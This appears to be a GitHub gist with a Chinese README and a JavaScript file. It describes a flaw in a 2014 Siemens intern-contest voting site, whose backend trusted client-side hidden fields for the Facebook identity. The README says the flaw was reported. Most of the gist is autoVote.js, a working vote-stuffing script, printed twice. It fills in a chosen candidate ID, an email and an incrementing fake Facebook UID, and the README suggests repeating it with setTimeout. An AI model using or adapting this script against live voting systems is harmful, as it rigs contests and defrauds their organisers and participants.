zetavg/README.md

## README.md

      
    Raw
  

              README.md
            
          
    2014 西門子超級實習生投票 網站漏洞

http://www.siemens-greenplus.com/2014ssip/
此漏洞已回報。
Facebook 登入竟然直接寫在前端，登入後把資料寫在 hidden 的 input 欄位，按下投票就把 hidden input 的 value 丟給後端直接建立投票資料 Orz。
實作

到任一投票頁面，load autoVote.js
autoVote.setVoteID(XXX); // 設定你要投給誰
autoVote.setFbuid(XXX); // 設定起始 Facebook uid
autoVote.setEmail('XXX'); // 設定你的 E-mail

autoVote(); // 自動投下神聖的一票，也許可以配合 setTimeout() 之類的...

  
## autoVote.js
var autoVote = function () {

	var fbuid = 10000;
	var email = 'mail@google.com';
	var voteID = 0;

	var vote = function () {
		$("#sVoteID").val(voteID);
		$("#sEmail").val(email);
		$("#sFBUID").val(fbuid);
		$("#sFBDisplayName").val('sFBDisplayName');
		Vote();
		fbuid++;
	};

	vote.setVoteID = function (n) {
		voteID = n;
		console.log(n);
	};

	vote.setFbuid = function (n) {
		fbuid = n;
		console.log(n);
	};

	vote.setEmail = function (n) {
		email = n;
		console.log(n);
	};

	return vote;
}();
	var autoVote = function () {

	var fbuid = 10000;
	var email = 'mail@google.com';
	var voteID = 0;

	var vote = function () {
	$("#sVoteID").val(voteID);
	$("#sEmail").val(email);
	$("#sFBUID").val(fbuid);
	$("#sFBDisplayName").val('sFBDisplayName');
	Vote();
	fbuid++;
	};

	vote.setVoteID = function (n) {
	voteID = n;
	console.log(n);
	};

	vote.setFbuid = function (n) {
	fbuid = n;
	console.log(n);
	};

	vote.setEmail = function (n) {
	email = n;
	console.log(n);
	};

	return vote;
	}();